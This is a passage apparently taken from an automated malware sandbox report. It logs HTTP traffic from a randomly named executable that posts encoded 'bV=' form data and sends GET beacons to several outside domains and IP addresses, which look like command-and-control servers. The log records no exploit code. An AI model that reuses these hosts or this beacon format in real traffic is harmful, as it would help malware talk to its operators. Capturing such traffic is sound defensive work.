                                                                                                                  Data Raw: 62 56 3d 45 4b 47 44 2b 46 4e 56 6b 2b 47 4f 4d 78 48 54 6f 4e 57 32 6f 39 58 7a 2b 6d 46 50 59 7a 72 57 6b 57 35 64 50 69 73 62 76 49 65 2f 43 4a 33 43 6b 53 35 2b 35 45 6a 30 67 51 4e 6b 4c 52 63 31 51 48 37 2b 36 7a 57 50 44 52 2f 43 4a 55 66 4d 70 65 51 77 31 51 70 78 51 4e 4d 45 66 34 4a 62 4f 51 7a 6f 66 66 44 39 37 78 73 57 43 46 61 45 6d 55 4a 6c 58 66 4d 2f 4f 57 47 2b 6d 43 66 35 32 2b 71 72 61 51 64 72 4a 64 42 71 44 6f 78 4a 30 65 50 4a 36 38 61 6a 4f 51 52 70 33 2f 4f 7a 72 4e 65 6c 7a 75 67 6e 57 58 59 53 54 6e 2b 43 4d 49 75 66 62 39 6e 61 43 47 78 69 6e 52 4f 74 67 72 78 46 4a 57 6e 6a 2f 31 6d 4c 51 49 67 70 48 6e 68 63 36 35 35 78 2b 6c 4f 4f
                                                                                                                  Data Ascii: bV=EKGD+FNVk+GOMxHToNW2o9Xz+mFPYzrWkW5dPisbvIe/CJ3CkS5+5Ej0gQNkLRc1QH7+6zWPDR/CJUfMpeQw1QpxQNMEf4JbOQzoffD97xsWCFaEmUJlXfM/OWG+mCf52+qraQdrJdBqDoxJ0ePJ68ajOQRp3/OzrNelzugnWXYSTn+CMIufb9naCGxinROtgrxFJWnj/1mLQIgpHnhc655x+lOO
                                                                                                                   Dec 2, 2024 15:26:19.251204967 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 02 Dec 2024 14:26:18 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 548
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                   Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                   39 | 192.168.2.5 | 50015 | 43.205.198.29 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                   Dec 2, 2024 15:26:20.375185966 CET | 1814 | OUT | POST /j8pv/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Connection: close
                                                                                                                  Host: www.1secondlending.one
                                                                                                                  Origin: http://www.1secondlending.one
                                                                                                                  Referer: http://www.1secondlending.one/j8pv/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Raw: 62 56 3d 45 4b 47 44 2b 46 4e 56 6b 2b 47 4f 4d 78 48 54 6f 4e 57 32 6f 39 58 7a 2b 6d 46 50 59 7a 72 57 6b 57 35 64 50 69 73 62 76 49 57 2f 43 36 2f 43 6c 78 52 2b 34 45 6a 30 74 77 4e 6c 4c 52 63 53 51 47 54 36 36 7a 53 35 44 54 58 43 49 33 58 4d 38 62 73 77 6d 77 70 78 50 39 4d 46 52 59 4a 53 4f 55 66 30 66 66 54 39 37 78 73 57 43 48 43 45 77 32 68 6c 52 66 4d 77 50 57 47 49 33 79 66 56 32 2b 54 65 61 51 5a 56 4a 4d 68 71 43 49 68 4a 79 73 6e 4a 78 38 61 68 4a 51 52 68 33 2f 43 73 72 4e 53 44 7a 74 39 41 57 56 49 53 52 33 79 42 5a 35 71 49 49 38 4c 58 52 48 6c 38 33 31 47 64 72 49 35 67 56 6b 6e 2f 37 67 65 2f 47 34 63 4e 47 47 46 56 75 4d 78 6a 2b 67 65 42 45 38 34 48 6d 37 4d 42 51 42 74 69 69 58 37 2b 38 57 36 35 33 52 74 76 6a 50 56 35 32 4f 4c 73 6b 63 45 6f 31 78 58 41 4e 36 47 49 43 30 58 67 41 36 4c 50 78 4f 65 68 7a 58 75 61 71 46 41 46 4f 72 34 4e 72 6e 4b 44 66 71 6b 42 6d 32 45 50 2b 68 45 62 50 56 4a 75 36 46 31 56 36 75 6e 4f 71 4c 42 56 33 65 45 35 30 42 35 52 35 44 6b 37 70 72 49 [TRUNCATED]
                                                                                                                   Data Ascii: bV= [TRUNCATED]
                                                                                                                   Dec 2, 2024 15:26:21.889749050 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                  Server: nginx
                                                                                                                  Date: Mon, 02 Dec 2024 14:26:21 GMT
                                                                                                                  Content-Type: text/html
                                                                                                                  Content-Length: 548
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
40          192.168.2.5  50016        43.205.198.29   80                728  C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe

Timestamp: Dec 2, 2024 15:26:23.029009104 CET | Bytes transferred: 503 | Direction: OUT | Data: GET /j8pv/?bV=JIuj9wxSnK6mEyWHgqme9cDOp2JPGD2avn5HAjA8ht24L6v+vQ9uqWv6ig59Dwg+VmGSo2u3Iy71OFL1070b7jwAWfgjYo1ceHXmQsmagjo2PVHkyEcMWf8OCye8gCuDoA==&wzcP=iLdd HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
Host: www.1secondlending.one
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Timestamp: Dec 2, 2024 15:26:24.548451900 CET | Bytes transferred: 691 | Direction: IN | Data: HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 02 Dec 2024 14:26:24 GMT
Content-Type: text/html
Content-Length: 548
Connection: close
                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
41          192.168.2.5  50017        172.67.187.114  80                728  C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe

Timestamp: Dec 2, 2024 15:26:30.085380077 CET | Bytes transferred: 762 | Direction: OUT | Data: POST /swhs/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Connection: close
Host: www.zkdamdjj.shop
Origin: http://www.zkdamdjj.shop
Referer: http://www.zkdamdjj.shop/swhs/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Ascii: bV=xz3VGnN6YJI+7xI+EeKUdICtNg12mabnjAfm2/uu/VwYkCDSph7R+tJQH6rmzIjQxRGgKl47BcLMhnUKDWfbQVojRgDzYPmLb0lTcPiAe17umYmRbgOjiap5waLKr5kPhMM5pi9zg6llZ4w6g4D+NUVpwhgPISY58vmphc0Q3rAZYVo02Mdm7dHNhdQFnTzm6A25Q7s=


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
42          192.168.2.5  50018        172.67.187.114  80                728  C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe

Timestamp: Dec 2, 2024 15:26:32.757044077 CET | Bytes transferred: 782 | Direction: OUT | Data: POST /swhs/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Connection: close
Host: www.zkdamdjj.shop
Origin: http://www.zkdamdjj.shop
Referer: http://www.zkdamdjj.shop/swhs/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Ascii: bV=xz3VGnN6YJI+ph4+JfKUUICuCA129KbrjAbm2+q+/GYYqArSog7R5tJQTqrj8ojHxR6CKh47BcPMhiQKChjYflo9dADxG/mLb0lTcP3te0TumpWRZBOir6p4zaLKv5kLhMMHpjRZg/hlZ806uJD5YEVwoBh7AQw9kcOXie1wrL5jUDZesuVOo9r1xOYy2jSPgjmJOs79f13tf3MfNNEYkkHvOKwc


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
43          192.168.2.5  50019        172.67.187.114  80                728  C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe

Timestamp: Dec 2, 2024 15:26:35.424570084 CET | Bytes transferred: 1799 | Direction: OUT | Data: POST /swhs/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 1239
Connection: close
Host: www.zkdamdjj.shop
Origin: http://www.zkdamdjj.shop
Referer: http://www.zkdamdjj.shop/swhs/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Ascii: bV=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 [TRUNCATED]


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
44          192.168.2.5  50020        172.67.187.114  80                728  C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe

Timestamp: Dec 2, 2024 15:26:38.090502977 CET | Bytes transferred: 498 | Direction: OUT | Data: GET /swhs/?bV=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTQ0tlUhCAXdO2W2lcbMXoQ37jkanwSyGhs5UT/ITwg7la8g==&wzcP=iLdd HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Connection: close
Host: www.zkdamdjj.shop
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
Timestamp: Dec 2, 2024 15:26:40.067817926 CET | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 301 Moved Permanently
Date: Mon, 02 Dec 2024 14:26:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
x-redirect-by: WordPress
location: https://zkdamdjj.shop/swhs/?bV=8xf1FTtyUpYkrTYPPLWUAP++SxZR47Hqllrz0dKQmws7hy/+lCnqv8MjCvT/8dHN8wn+YkpcLfbwvxo0J0bTQ0tlUhCAXdO2W2lcbMXoQ37jkanwSyGhs5UT/ITwg7la8g==&wzcP=iLdd
x-litespeed-cache-control: public,max-age=3600
x-litespeed-tag: 02a_HTTP.404,02a_HTTP.301,02a_404,02a_URL.9b9a69d1fac6b11918e507384a598f21,02a_
x-litespeed-cache: miss
CF-Cache-Status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kgGTpWoDKrA7VpoHDrZqfRAfI98VPZVGBQ0fVLU9sGIm6LhpA6F6PcCu%2FDsVSV5qesabDAbx2XcT0l%2F3cOL7%2BPhdrxdFjPLOtyybJNWKIZ7mDeBkyIWREgnFPb%2Fd2Zqc%2B9kLhg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ebbfe423c8043b7-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1580&rtt_var=790&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=498&delivery_rate=0&cwnd=234&unsent_b
Data Raw:
Data Ascii:
Timestamp: Dec 2, 2024 15:26:40.067833900 CET | Bytes transferred: 45 | Direction: IN | Data Raw: 74 65 73 3d 30 26 63 69 64 3d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: tes=0&cid=0000000000000000&ts=0&x=0"0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
45          192.168.2.5  50021        172.67.167.146  80                728  C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe

Timestamp: Dec 2, 2024 15:26:45.688560963 CET | Bytes transferred: 774 | Direction: OUT | Data: POST /8gp4/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Connection: close
Host: www.rgenerousrs.store
Origin: http://www.rgenerousrs.store
Referer: http://www.rgenerousrs.store/8gp4/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Ascii: bV=IG25VTF5RrEDgRM/7yST8+I7g5HhVOhLyb8E1+wRYQBz+DYAMvewq2oHx48JgsFHI6Ok07riPikWp3eT9Ke8HlvUOnpqxRxeELDX40VmAzcOae+efjFWg8SyfkB59WYnTpqGMDcH9AhwbtWeqavy5B5Bx/ttZ65S2LFR0I7zKfDk4B/W/sMYnU40QgJNds2AVPLuxYU=
Timestamp: Dec 2, 2024 15:26:47.272048950 CET | Bytes transferred: 1100 | Direction: IN | Data: HTTP/1.1 404 Not Found
Date: Mon, 02 Dec 2024 14:26:47 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q999qeSC8rjum2VgqBSdrdB5hrZyxQ9k3wIitk0%2Bq%2BUmuicI%2FGUNZtzB%2ByyALXbC%2BlFu97B3Cmc62QK5iyb6PSzYefJbmUUpBE9ElfS4bJ5vZ6bMzPbhrA0Xg2DFjoBwq1JEuzAR%2Fj8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ebbfe719a1919b6-EWR
                                                                                                                  Content-Encoding: gzip
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1827&min_rtt=1827&rtt_var=913&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=774&delivery_rate=0&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
46          192.168.2.5  50022        172.67.167.146  80                728  C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe

Timestamp: Dec 2, 2024 15:26:48.347707033 CET | Bytes transferred: 794 | Direction: OUT | Data: POST /8gp4/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US
Accept-Encoding: gzip, deflate, br
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 223
Connection: close
Host: www.rgenerousrs.store
Origin: http://www.rgenerousrs.store
Referer: http://www.rgenerousrs.store/8gp4/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Ascii: bV=IG25VTF5RrEDhx8/3yuT6eI4vZHhcuhPybwE1/FaZiVz+mkAdbywt2oHpI8I+cF6I6Db07niPiwWpyaT98W/G1vSFHp0shxeELDX40RAAz0OZvOecBtV8sS9PUB55WYZTpqwMCBa9CZwbsmeqLvzzB5H1/sHfPU+8bRf5pupe9zG53O8lOEw00UMAzB6McXpPsbevPCkcAsc7z9pl/KRB2CPDpJZ
                                                                                                                   Dec 2, 2024 15:26:49.854129076 CET | 1098 | IN | HTTP/1.1 404 Not Found
                                                                                                                  Date: Mon, 02 Dec 2024 14:26:49 GMT
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SafWd9HfBOJymYdjoJB712v%2Fy6PkvH8BrDlPy9nQ1Cl%2BnX28Tamxy4nEadM3QzsA8TVLUwG6WD1vrpVcEbjlu%2FuN7ud6VHj10Az9jLyhtZPoQRrhnzG%2Fk%2FWqG0hT2UkL10uPJKY2b44%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ebbfe8279eff5f7-EWR
                                                                                                                  Content-Encoding: gzip
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1691&rtt_var=845&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=794&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                   Dec 2, 2024 15:26:49.855145931 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                   47 | 192.168.2.5 | 50023 | 172.67.167.146 | 80 | 728 | C:\Program Files (x86)\URykIbKWWDMlJUeLUYouEVrRBahEEyKRfOYKTHZTrAMfOQpBsbPgMhnbTlcDGzMLxvFo\nfGtWoQBhJSQ.exe
                                                                                                                   Timestamp | Bytes transferred | Direction | Data
                                                                                                                   Dec 2, 2024 15:26:51.019052982 CET | 1811 | OUT | POST /8gp4/ HTTP/1.1
                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Content-Length: 1239
                                                                                                                  Connection: close
                                                                                                                  Host: www.rgenerousrs.store
                                                                                                                  Origin: http://www.rgenerousrs.store
                                                                                                                  Referer: http://www.rgenerousrs.store/8gp4/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                  Data Ascii: bV=IG25VTF5RrEDhx8/3yuT6eI4vZHhcuhPybwE1/FaZiNz+QwAPKyws2oH348N+cFrI+vf076XPgIW4kmTtJ2/M1vSKnp1xRwcEKzT40BAAz0OZtGeLDFVvcSyfkB19WYiTpygMCUthi5wYM2ev53z7B5Fy/sffPQh8a995oqHe/TG5Cmr+PAo2ExpNR1AM6HJPOGvio6jZkAo709kmM/+AwObMtkH0qr4hLyTCkbn1YCdl4diRMS3NO5lFROkm82rcw1fUrNzkcwqpeSe0EYlcACi/VyHFucIufG8jeNseFtHFheTN17jK8rYc6E13UtaHaKDx3BOwDii+QQ0x6xxXUl0SPXgV1o14z4C+50ozlJ4NSTrrL/dp84cXA7XhES8JWJFqmpOfojOoRUTva0KEMkS1PpMV/5p6/5WEc4EeUO88W7rOME5CFGYkOG/5KkrqsGk1Q+wMrg6EoXIqx/1fV2WGjZOm8kqQUiAFHcyPlb/t/GS8sov0RxuqCtLu+kzrEsaeIMgdASPymLUSKHEfu/1Ycnhs0ffIXQJO7I2dE4vlL3ngi06o0xWMsbpvHCgyswz9b/cNIuwIlAkigXt8QV4ii8mkE2rUyZnTkEfXGofeJCYqe2e9FQZBmDYHarXIMWwAeCVzdoGZhJSBbBGaPd4A1Ex3gcW6xMQ4/5T6heKe19Iv9Tw3s2XvGW+/FA6kUauuDabLwHNt224NII/gQ/oNRd0rWPULyEnyRqs7jPkroFjU8Lf80ew+w3JX7fm6uMUPDd6Kz/Fj3CWl0MAu6gDKbj1ecwi+A05cFG+0Pqhm2Opp1VbN9N/rIP3xyKRR6eiy2v3zFSuUSeLXTH7h1+uOIwggLyt7wjO9z/1ksQxMlsoOSzE0YbdW6DlGuYFsx3RZImoL00ZMs+8vE3YNzmapMT6CJs464NkDhmDt5YPCc+H4MMG/8W100SEdjo9Q3Lcf0OWol9nEpkKPKB4htRaByjvtF/MNgsP0AC3b9Ok31jQ9 [TRUNCATED]
                                                                                                                   Dec 2, 2024 15:26:52.517781973 CET | 1104 | IN | HTTP/1.1 404 Not Found
                                                                                                                  Date: Mon, 02 Dec 2024 14:26:52 GMT
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eLqNiMYY1ux9mYEQfcHVl7N%2FI4UrRyMKGZ5llvJ9iBA6ZCO%2Bqe3t%2BfOb76vYEfFkDW3yK3ClLINxBWm4UFkZAabfNKsJ7q%2FkWlKL5IyiO1ODG2REysVk%2FQzJPfwsaRqWn8yXEM7M1Ks%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8ebbfe931d1e42e8-EWR
                                                                                                                  Content-Encoding: gzip
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1777&rtt_var=888&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1811&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                                   Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
